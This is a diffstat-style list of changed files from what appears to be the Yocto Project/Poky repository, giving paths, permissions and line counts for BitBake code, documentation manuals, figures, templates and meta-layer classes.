-rw-r--r--README.OE-Core10
-rw-r--r--SECURITY.md24
-rw-r--r--bitbake/SECURITY.md24
-rwxr-xr-xbitbake/bin/bitbake-getvar48
-rwxr-xr-xbitbake/bin/bitbake-worker14
-rw-r--r--bitbake/doc/.gitignore1
-rw-r--r--bitbake/doc/Makefile108
-rw-r--r--bitbake/doc/README50
-rw-r--r--bitbake/doc/_templates/breadcrumbs.html14
-rw-r--r--bitbake/doc/_templates/layout.html7
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-customization.xsl29
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.rst733
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.xml1029
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst621
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.xml868
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.rst415
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.xml513
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.rst651
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.xml891
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.rst1969
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.xml2862
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.rst1372
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.xml2537
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-style.css984
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual.xml88
-rw-r--r--bitbake/doc/bitbake-user-manual/html.css281
-rw-r--r--bitbake/doc/conf.py101
-rw-r--r--bitbake/doc/genindex.rst3
-rw-r--r--bitbake/doc/index.rst38
-rw-r--r--bitbake/doc/poky.ent51
-rw-r--r--bitbake/doc/releases.rst130
-rw-r--r--bitbake/doc/sphinx-static/switchers.js233
-rw-r--r--bitbake/doc/sphinx-static/theme_overrides.css162
-rw-r--r--bitbake/doc/template/Vera.xml1
-rw-r--r--bitbake/doc/template/VeraMoBd.xml1
-rw-r--r--bitbake/doc/template/VeraMono.xml1
-rw-r--r--bitbake/doc/template/component.title.xsl39
-rw-r--r--bitbake/doc/template/db-pdf.xsl64
-rw-r--r--bitbake/doc/template/division.title.xsl25
-rw-r--r--bitbake/doc/template/fop-config.xml58
-rw-r--r--bitbake/doc/template/formal.object.heading.xsl21
-rw-r--r--bitbake/doc/template/gloss-permalinks.xsl14
-rw-r--r--bitbake/doc/template/permalinks.xsl25
-rw-r--r--bitbake/doc/template/section.title.xsl55
-rw-r--r--bitbake/doc/template/titlepage.templates.xml1259
-rwxr-xr-xbitbake/doc/tools/docbook-to-pdf51
-rw-r--r--bitbake/lib/bb/__init__.py9
-rw-r--r--bitbake/lib/bb/build.py19
-rw-r--r--bitbake/lib/bb/command.py28
-rw-r--r--bitbake/lib/bb/compat.py10
-rw-r--r--bitbake/lib/bb/cooker.py52
-rw-r--r--bitbake/lib/bb/cookerdata.py14
-rw-r--r--bitbake/lib/bb/data.py1
-rw-r--r--bitbake/lib/bb/data_smart.py22
-rw-r--r--bitbake/lib/bb/event.py16
-rw-r--r--bitbake/lib/bb/fetch2/__init__.py10
-rw-r--r--bitbake/lib/bb/fetch2/git.py108
-rw-r--r--bitbake/lib/bb/fetch2/wget.py24
-rw-r--r--bitbake/lib/bb/monitordisk.py7
-rw-r--r--bitbake/lib/bb/msg.py6
-rw-r--r--bitbake/lib/bb/parse/ast.py2
-rw-r--r--bitbake/lib/bb/parse/parse_py/BBHandler.py2
-rw-r--r--bitbake/lib/bb/parse/parse_py/ConfHandler.py2
-rw-r--r--bitbake/lib/bb/persist_data.py13
-rw-r--r--bitbake/lib/bb/process.py3
-rw-r--r--bitbake/lib/bb/providers.py4
-rw-r--r--bitbake/lib/bb/runqueue.py185
-rw-r--r--bitbake/lib/bb/server/process.py16
-rw-r--r--bitbake/lib/bb/siggen.py3
-rw-r--r--bitbake/lib/bb/tests/codeparser.py30
-rw-r--r--bitbake/lib/bb/tests/event.py17
-rw-r--r--bitbake/lib/bb/tests/fetch.py145
-rw-r--r--bitbake/lib/bb/tinfoil.py17
-rw-r--r--bitbake/lib/bb/ui/knotty.py32
-rw-r--r--bitbake/lib/bb/ui/taskexp.py12
-rw-r--r--bitbake/lib/bb/utils.py52
-rw-r--r--bitbake/lib/bblayers/action.py4
-rw-r--r--bitbake/lib/bblayers/layerindex.py1
-rw-r--r--bitbake/lib/bblayers/query.py8
-rw-r--r--bitbake/lib/hashserv/server.py23
-rw-r--r--bitbake/lib/layerindexlib/__init__.py1
-rw-r--r--bitbake/lib/toaster/toastergui/api.py26
-rw-r--r--documentation/.gitignore2
-rw-r--r--documentation/Makefile448
-rw-r--r--documentation/Pipfile14
-rw-r--r--documentation/README308
-rw-r--r--documentation/_templates/breadcrumbs.html14
-rw-r--r--documentation/_templates/footer.html12
-rw-r--r--documentation/_templates/layout.html7
-rw-r--r--documentation/adt-manual/adt-command.xml265
-rw-r--r--documentation/adt-manual/adt-intro.xml180
-rw-r--r--documentation/adt-manual/adt-manual-customization.xsl27
-rw-r--r--documentation/adt-manual/adt-manual-eclipse-customization.xsl35
-rw-r--r--documentation/adt-manual/adt-manual-intro.xml33
-rw-r--r--documentation/adt-manual/adt-manual.xml140
-rw-r--r--documentation/adt-manual/adt-package.xml102
-rw-r--r--documentation/adt-manual/adt-prepare.xml999
-rw-r--r--documentation/adt-manual/adt-style.css984
-rw-r--r--documentation/adt-manual/figures/adt-title.pngbin13498 -> 0 bytes
-rw-r--r--documentation/adt-manual/figures/using-a-pre-built-image.pngbin12733 -> 0 bytes
-rw-r--r--documentation/boilerplate.rst18
-rw-r--r--documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-customization.xsl24
-rw-r--r--documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-style.css989
-rw-r--r--documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-titlepage.xsl3820
-rw-r--r--documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst421
-rw-r--r--documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.xml576
-rw-r--r--documentation/bsp-guide/bsp-guide-customization.xsl27
-rw-r--r--documentation/bsp-guide/bsp-guide.rst16
-rwxr-xr-xdocumentation/bsp-guide/bsp-guide.xml221
-rw-r--r--documentation/bsp-guide/bsp-style.css987
-rw-r--r--documentation/bsp-guide/bsp.rst1532
-rw-r--r--documentation/bsp-guide/bsp.xml2258
-rw-r--r--documentation/bsp-guide/history.rst85
-rw-r--r--documentation/conf.py151
-rw-r--r--documentation/dev-manual/dev-manual-common-tasks.rst11683
-rw-r--r--documentation/dev-manual/dev-manual-common-tasks.xml16022
-rw-r--r--documentation/dev-manual/dev-manual-customization.xsl27
-rw-r--r--documentation/dev-manual/dev-manual-intro.rst61
-rw-r--r--documentation/dev-manual/dev-manual-intro.xml103
-rw-r--r--documentation/dev-manual/dev-manual-qemu.rst477
-rw-r--r--documentation/dev-manual/dev-manual-qemu.xml690
-rw-r--r--documentation/dev-manual/dev-manual-start.rst926
-rw-r--r--documentation/dev-manual/dev-manual-start.xml1287
-rw-r--r--documentation/dev-manual/dev-manual.rst19
-rwxr-xr-xdocumentation/dev-manual/dev-manual.xml214
-rw-r--r--documentation/dev-manual/dev-style.css988
-rw-r--r--documentation/dev-manual/history.rst79
-rw-r--r--documentation/figures/yp-how-it-works-new-diagram.pngbin0 -> 249657 bytes
-rw-r--r--documentation/genindex.rst3
-rw-r--r--documentation/index.rst52
-rw-r--r--documentation/kernel-dev/history.rst70
-rw-r--r--documentation/kernel-dev/kernel-dev-advanced.rst957
-rw-r--r--documentation/kernel-dev/kernel-dev-advanced.xml1256
-rw-r--r--documentation/kernel-dev/kernel-dev-common.rst2031
-rw-r--r--documentation/kernel-dev/kernel-dev-common.xml2729
-rw-r--r--documentation/kernel-dev/kernel-dev-concepts-appx.rst425
-rw-r--r--documentation/kernel-dev/kernel-dev-concepts-appx.xml621
-rw-r--r--documentation/kernel-dev/kernel-dev-customization.xsl26
-rw-r--r--documentation/kernel-dev/kernel-dev-faq.rst80
-rw-r--r--documentation/kernel-dev/kernel-dev-faq.xml142
-rw-r--r--documentation/kernel-dev/kernel-dev-intro.rst182
-rw-r--r--documentation/kernel-dev/kernel-dev-intro.xml259
-rw-r--r--documentation/kernel-dev/kernel-dev-maint-appx.rst239
-rw-r--r--documentation/kernel-dev/kernel-dev-maint-appx.xml356
-rw-r--r--documentation/kernel-dev/kernel-dev-style.css988
-rw-r--r--documentation/kernel-dev/kernel-dev.rst21
-rwxr-xr-xdocumentation/kernel-dev/kernel-dev.xml206
-rw-r--r--documentation/mega-manual/figures/YP-flow-diagram.pngbin185562 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/add-variable.pngbin110712 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/analysis-for-package-splitting.pngbin68434 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/bash-oecore.pngbin138198 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/bb_multiconfig_files.pngbin19991 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/bitbake-build-flow.pngbin49242 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/bitbake-title.pngbin5086 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/bsp-dev-flow.pngbin52657 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/bsp-title.pngbin17388 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/build-workspace-directory.pngbin29627 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/buildhistory-web.pngbin49966 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/buildhistory.pngbin44900 -> 0 bytes
-rwxr-xr-xdocumentation/mega-manual/figures/building-an-image.pngbin14891 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/bypqs-title.pngbin14312 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/compatible-layers.pngbin163081 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/concepts-manual-title.pngbin11920 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/configuration-compile-autoreconf.pngbin70877 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/cross-development-toolchains.pngbin82633 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/cute-files-npm-example.pngbin26248 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/define-generic.pngbin623 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/dev-title.pngbin15950 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/git-workflow.pngbin26586 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/hosted-service.pngbin13552 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/image-generation.pngbin123348 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/images.pngbin32674 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/import-layer.pngbin139108 -> 0 bytes
-rwxr-xr-xdocumentation/mega-manual/figures/index-downloads.pngbin18142 -> 0 bytes
-rwxr-xr-xdocumentation/mega-manual/figures/kernel-architecture-overview.pngbin40748 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/kernel-dev-flow.pngbin53197 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/kernel-dev-title.pngbin13453 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/kernel-overview-1.pngbin35839 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/kernel-overview-2-generic.pngbin49230 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/kernel-title.pngbin13970 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/kernelshark-all.pngbin89316 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/kernelshark-choose-events.pngbin57372 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/kernelshark-i915-display.pngbin98765 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/kernelshark-output-display.pngbin204454 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/key-dev-elements.pngbin20424 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/layer-input.pngbin62330 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/mega-title.pngbin10536 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/multiconfig_files.pngbin18611 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/new-project.pngbin73760 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/oprofileui-busybox.pngbin98334 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/oprofileui-copy-to-user.pngbin105661 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/oprofileui-downloading.pngbin37301 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/oprofileui-processes.pngbin95741 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/overview-manual-title.pngbin17387 -> 0 bytes
-rwxr-xr-xdocumentation/mega-manual/figures/package-feeds.pngbin42239 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/patching.pngbin57414 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-probe-do_fork-profile.pngbin59078 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-report-cycles-u.pngbin171368 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-systemwide-libc.pngbin136826 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-systemwide.pngbin140616 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-wget-busybox-annotate-menu.pngbin22364 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-wget-busybox-annotate-udhcpc.pngbin171529 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-wget-busybox-debuginfo.pngbin174971 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-wget-busybox-dso-zoom-menu.pngbin23735 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-wget-busybox-dso-zoom.pngbin101685 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-wget-busybox-expanded-stripped.pngbin95140 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-wget-flat-stripped.pngbin178919 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-wget-g-copy-from-user-expanded-stripped.pngbin138550 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-debuginfo.pngbin102790 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped-unresolved-hidden.pngbin110101 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped.pngbin102812 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/poky-reference-distribution.pngbin23784 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/poky-title.pngbin11592 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/profile-title.pngbin12799 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/pybootchartgui-linux-yocto.pngbin36366 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/pychart-linux-yocto-rpm-nostrip.pngbin98053 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/pychart-linux-yocto-rpm.pngbin81053 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/recipe-workflow.pngbin48276 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sched-wakeup-profile.pngbin123810 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sdk-autotools-flow.pngbin50443 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sdk-devtool-add-flow.pngbin181699 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sdk-devtool-modify-flow.pngbin171676 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sdk-devtool-upgrade-flow.pngbin138917 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sdk-environment.pngbin42098 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sdk-generation.pngbin60574 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sdk-installed-extensible-sdk-directory.pngbin66753 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sdk-installed-standard-sdk-directory.pngbin39099 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sdk-makefile-flow.pngbin47197 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sdk-title.pngbin31039 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sdk.pngbin49804 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/set-variable.pngbin111430 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/simple-configuration.pngbin10789 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/source-fetching.pngbin46896 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/source-input.pngbin51170 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/source-repos.pngbin167009 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sysprof-callers.pngbin145043 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sysprof-copy-from-user.pngbin132976 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/sysprof-copy-to-user.pngbin132074 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/toaster-title.pngbin9277 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/user-configuration.pngbin51171 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/using-a-pre-built-image.pngbin12733 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/variable-added.pngbin112163 -> 0 bytes
-rwxr-xr-xdocumentation/mega-manual/figures/yocto-project-transp.pngbin8626 -> 0 bytes
-rw-r--r--documentation/mega-manual/figures/yp-download.pngbin82939 -> 0 bytes
-rw-r--r--documentation/mega-manual/mega-manual-customization.xsl42
-rwxr-xr-xdocumentation/mega-manual/mega-manual.xml382
-rw-r--r--documentation/mega-manual/mega-style.css989
-rw-r--r--documentation/overview-manual/history.rst40
-rw-r--r--documentation/overview-manual/overview-manual-concepts.rst2183
-rw-r--r--documentation/overview-manual/overview-manual-concepts.xml3234
-rw-r--r--documentation/overview-manual/overview-manual-customization.xsl27
-rw-r--r--documentation/overview-manual/overview-manual-development-environment.rst672
-rw-r--r--documentation/overview-manual/overview-manual-development-environment.xml953
-rw-r--r--documentation/overview-manual/overview-manual-intro.rst74
-rw-r--r--documentation/overview-manual/overview-manual-intro.xml112
-rw-r--r--documentation/overview-manual/overview-manual-style.css988
-rw-r--r--documentation/overview-manual/overview-manual-yp-intro.rst941
-rw-r--r--documentation/overview-manual/overview-manual-yp-intro.xml1332
-rw-r--r--documentation/overview-manual/overview-manual.rst19
-rwxr-xr-xdocumentation/overview-manual/overview-manual.xml149
-rwxr-xr-xdocumentation/poky.ent89
-rw-r--r--documentation/poky.yaml44
-rw-r--r--documentation/profile-manual/history.rst70
-rw-r--r--documentation/profile-manual/profile-manual-arch.rst29
-rw-r--r--documentation/profile-manual/profile-manual-arch.xml45
-rw-r--r--documentation/profile-manual/profile-manual-customization.xsl27
-rw-r--r--documentation/profile-manual/profile-manual-examples.rst24
-rw-r--r--documentation/profile-manual/profile-manual-examples.xml39
-rw-r--r--documentation/profile-manual/profile-manual-intro.rst79
-rw-r--r--documentation/profile-manual/profile-manual-intro.xml106
-rw-r--r--documentation/profile-manual/profile-manual-style.css984
-rw-r--r--documentation/profile-manual/profile-manual-usage.rst2623
-rw-r--r--documentation/profile-manual/profile-manual-usage.xml2985
-rw-r--r--documentation/profile-manual/profile-manual.rst19
-rwxr-xr-xdocumentation/profile-manual/profile-manual.xml199
-rw-r--r--documentation/ref-manual/examples/hello-autotools/hello_2.10.bb9
-rw-r--r--documentation/ref-manual/examples/hello-autotools/hello_2.3.bb8
-rw-r--r--documentation/ref-manual/examples/libxpm/libxpm_3.5.6.bb2
-rw-r--r--documentation/ref-manual/faq.rst464
-rw-r--r--documentation/ref-manual/faq.xml835
-rw-r--r--documentation/ref-manual/history.rst86
-rw-r--r--documentation/ref-manual/migration-1.3.rst195
-rw-r--r--documentation/ref-manual/migration-1.4.rst237
-rw-r--r--documentation/ref-manual/migration-1.5.rst353
-rw-r--r--documentation/ref-manual/migration-1.6.rst416
-rw-r--r--documentation/ref-manual/migration-1.7.rst223
-rw-r--r--documentation/ref-manual/migration-1.8.rst183
-rw-r--r--documentation/ref-manual/migration-2.0.rst281
-rw-r--r--documentation/ref-manual/migration-2.1.rst436
-rw-r--r--documentation/ref-manual/migration-2.2.rst450
-rw-r--r--documentation/ref-manual/migration-2.3.rst523
-rw-r--r--documentation/ref-manual/migration-2.4.rst327
-rw-r--r--documentation/ref-manual/migration-2.5.rst310
-rw-r--r--documentation/ref-manual/migration-2.6.rst457
-rw-r--r--documentation/ref-manual/migration-2.7.rst180
-rw-r--r--documentation/ref-manual/migration-3.0.rst319
-rw-r--r--documentation/ref-manual/migration-3.1.rst276
-rw-r--r--documentation/ref-manual/migration-general.rst54
-rw-r--r--documentation/ref-manual/migration.rst30
-rw-r--r--documentation/ref-manual/migration.xml7300
-rw-r--r--documentation/ref-manual/ref-classes.rst2899
-rw-r--r--documentation/ref-manual/ref-classes.xml3893
-rw-r--r--documentation/ref-manual/ref-devtool-reference.rst631
-rw-r--r--documentation/ref-manual/ref-devtool-reference.xml841
-rw-r--r--documentation/ref-manual/ref-features.rst352
-rw-r--r--documentation/ref-manual/ref-features.xml460
-rw-r--r--documentation/ref-manual/ref-images.rst139
-rw-r--r--documentation/ref-manual/ref-images.xml169
-rw-r--r--documentation/ref-manual/ref-kickstart.rst216
-rw-r--r--documentation/ref-manual/ref-kickstart.xml334
-rw-r--r--documentation/ref-manual/ref-manual-customization.xsl29
-rw-r--r--documentation/ref-manual/ref-manual.rst31
-rwxr-xr-xdocumentation/ref-manual/ref-manual.xml252
-rw-r--r--documentation/ref-manual/ref-qa-checks.rst568
-rw-r--r--documentation/ref-manual/ref-qa-checks.xml1199
-rw-r--r--documentation/ref-manual/ref-release-process.rst191
-rw-r--r--documentation/ref-manual/ref-release-process.xml255
-rw-r--r--documentation/ref-manual/ref-structure.rst874
-rw-r--r--documentation/ref-manual/ref-structure.xml1122
-rw-r--r--documentation/ref-manual/ref-style.css1032
-rw-r--r--documentation/ref-manual/ref-system-requirements.rst475
-rw-r--r--documentation/ref-manual/ref-system-requirements.xml578
-rw-r--r--documentation/ref-manual/ref-tasks.rst855
-rw-r--r--documentation/ref-manual/ref-tasks.xml1130
-rw-r--r--documentation/ref-manual/ref-terms.rst394
-rw-r--r--documentation/ref-manual/ref-terms.xml524
-rw-r--r--documentation/ref-manual/ref-variables.rst8801
-rw-r--r--documentation/ref-manual/ref-variables.xml16700
-rw-r--r--documentation/ref-manual/ref-varlocality.rst166
-rw-r--r--documentation/ref-manual/ref-varlocality.xml198
-rw-r--r--documentation/ref-manual/resources.rst197
-rw-r--r--documentation/ref-manual/resources.xml297
-rw-r--r--documentation/releases.rst228
-rw-r--r--documentation/sdk-manual/history.rst52
-rw-r--r--documentation/sdk-manual/sdk-appendix-customizing-standard.rst34
-rw-r--r--documentation/sdk-manual/sdk-appendix-customizing-standard.xml58
-rw-r--r--documentation/sdk-manual/sdk-appendix-customizing.rst377
-rw-r--r--documentation/sdk-manual/sdk-appendix-customizing.xml514
-rw-r--r--documentation/sdk-manual/sdk-appendix-obtain.rst321
-rw-r--r--documentation/sdk-manual/sdk-appendix-obtain.xml443
-rw-r--r--documentation/sdk-manual/sdk-extensible.rst1356
-rw-r--r--documentation/sdk-manual/sdk-extensible.xml1846
-rw-r--r--documentation/sdk-manual/sdk-intro.rst224
-rw-r--r--documentation/sdk-manual/sdk-intro.xml352
-rw-r--r--documentation/sdk-manual/sdk-manual-customization.xsl26
-rw-r--r--documentation/sdk-manual/sdk-manual.rst22
-rwxr-xr-xdocumentation/sdk-manual/sdk-manual.xml178
-rw-r--r--documentation/sdk-manual/sdk-style.css988
-rw-r--r--documentation/sdk-manual/sdk-using.rst159
-rw-r--r--documentation/sdk-manual/sdk-using.xml200
-rw-r--r--documentation/sdk-manual/sdk-working-projects.rst423
-rw-r--r--documentation/sdk-manual/sdk-working-projects.xml510
-rw-r--r--documentation/sphinx-static/YoctoProject_Logo_RGB.jpgbin0 -> 49299 bytes
-rw-r--r--documentation/sphinx-static/switchers.js236
-rw-r--r--documentation/sphinx-static/theme_overrides.css164
-rw-r--r--documentation/sphinx/yocto-vars.py86
-rw-r--r--documentation/template/Vera.xml1
-rw-r--r--documentation/template/VeraMoBd.xml1
-rw-r--r--documentation/template/VeraMono.xml1
-rw-r--r--documentation/template/component.title.xsl39
-rw-r--r--documentation/template/division.title.xsl24
-rw-r--r--documentation/template/embedded_video.xsl22
-rw-r--r--documentation/template/fop-config.xml58
-rw-r--r--documentation/template/formal.object.heading.xsl21
-rw-r--r--documentation/template/gloss-permalinks.xsl14
-rw-r--r--documentation/template/permalinks.xsl25
-rw-r--r--documentation/template/poky-db-pdf.xsl64
-rw-r--r--documentation/template/qa-code-permalinks.xsl23
-rw-r--r--documentation/template/section.title.xsl55
-rw-r--r--documentation/template/titlepage.templates.xml1227
-rw-r--r--documentation/toaster-manual/history.rst58
-rw-r--r--documentation/toaster-manual/toaster-manual-customization.xsl28
-rw-r--r--documentation/toaster-manual/toaster-manual-intro.rst105
-rw-r--r--documentation/toaster-manual/toaster-manual-intro.xml164
-rw-r--r--documentation/toaster-manual/toaster-manual-reference.rst662
-rw-r--r--documentation/toaster-manual/toaster-manual-reference.xml836
-rw-r--r--documentation/toaster-manual/toaster-manual-setup-and-use.rst651
-rw-r--r--documentation/toaster-manual/toaster-manual-setup-and-use.xml843
-rw-r--r--documentation/toaster-manual/toaster-manual-start.rst57
-rw-r--r--documentation/toaster-manual/toaster-manual-start.xml115
-rw-r--r--documentation/toaster-manual/toaster-manual-style.css984
-rw-r--r--documentation/toaster-manual/toaster-manual.rst19
-rwxr-xr-xdocumentation/toaster-manual/toaster-manual.xml178
-rw-r--r--documentation/tools/eclipse-help.sed18
-rw-r--r--documentation/tools/mega-manual.sed36
-rwxr-xr-xdocumentation/tools/poky-docbook-to-pdf51
-rw-r--r--documentation/tools/update-documentation-conf16
-rw-r--r--documentation/transitioning-to-a-custom-environment.rst116
-rw-r--r--documentation/what-i-wish-id-known.rst226
-rw-r--r--meta-poky/conf/distro/poky-tiny.conf2
-rw-r--r--meta-poky/conf/distro/poky.conf38
-rw-r--r--meta-poky/conf/local.conf.sample2
-rw-r--r--meta-poky/conf/local.conf.sample.extended23
-rw-r--r--meta-selftest/lib/pseudo_pyc_test1.py1
-rw-r--r--meta-selftest/lib/pseudo_pyc_test2.py1
-rw-r--r--meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb1
-rw-r--r--meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb2
-rw-r--r--meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded2
-rw-r--r--meta-selftest/recipes-test/images/oe-selftest-image.bb2
-rw-r--r--meta-selftest/recipes-test/images/wic-image-minimal.bb5
-rw-r--r--meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb15
-rw-r--r--meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb2
-rw-r--r--meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb1
-rw-r--r--meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb1
-rw-r--r--meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb2
-rw-r--r--meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb3
-rw-r--r--meta-skeleton/recipes-skeleton/service/service_0.1.bb1
-rw-r--r--meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend8
-rw-r--r--meta/classes/archiver.bbclass22
-rw-r--r--meta/classes/base.bbclass24
-rw-r--r--meta/classes/bin_package.bbclass3
-rw-r--r--meta/classes/buildhistory.bbclass36
-rw-r--r--meta/classes/cmake.bbclass3
-rw-r--r--meta/classes/cml1.bbclass8
-rw-r--r--meta/classes/create-spdx-2.2.bbclass1067
-rw-r--r--meta/classes/create-spdx.bbclass8
-rw-r--r--meta/classes/cve-check.bbclass479
-rw-r--r--meta/classes/devshell.bbclass1
-rw-r--r--meta/classes/devtool-source.bbclass4
-rw-r--r--meta/classes/devupstream.bbclass2
-rw-r--r--meta/classes/distutils-common-base.bbclass2
-rw-r--r--meta/classes/distutils3-base.bbclass2
-rw-r--r--meta/classes/distutils3.bbclass10
-rw-r--r--meta/classes/externalsrc.bbclass29
-rw-r--r--meta/classes/fs-uuid.bbclass2
-rw-r--r--meta/classes/go.bbclass13
-rw-r--r--meta/classes/goarch.bbclass2
-rw-r--r--meta/classes/grub-efi-cfg.bbclass1
-rw-r--r--meta/classes/image-live.bbclass4
-rw-r--r--meta/classes/image.bbclass17
-rw-r--r--meta/classes/image_types.bbclass4
-rw-r--r--meta/classes/image_types_wic.bbclass20
-rw-r--r--meta/classes/insane.bbclass42
-rw-r--r--meta/classes/kernel-arch.bbclass4
-rw-r--r--meta/classes/kernel-devicetree.bbclass18
-rw-r--r--meta/classes/kernel-fitimage.bbclass187
-rw-r--r--meta/classes/kernel-module-split.bbclass5
-rw-r--r--meta/classes/kernel-yocto.bbclass55
-rw-r--r--meta/classes/kernel.bbclass75
-rw-r--r--meta/classes/libc-package.bbclass3
-rw-r--r--meta/classes/license.bbclass15
-rw-r--r--meta/classes/license_image.bbclass28
-rw-r--r--meta/classes/linux-dummy.bbclass26
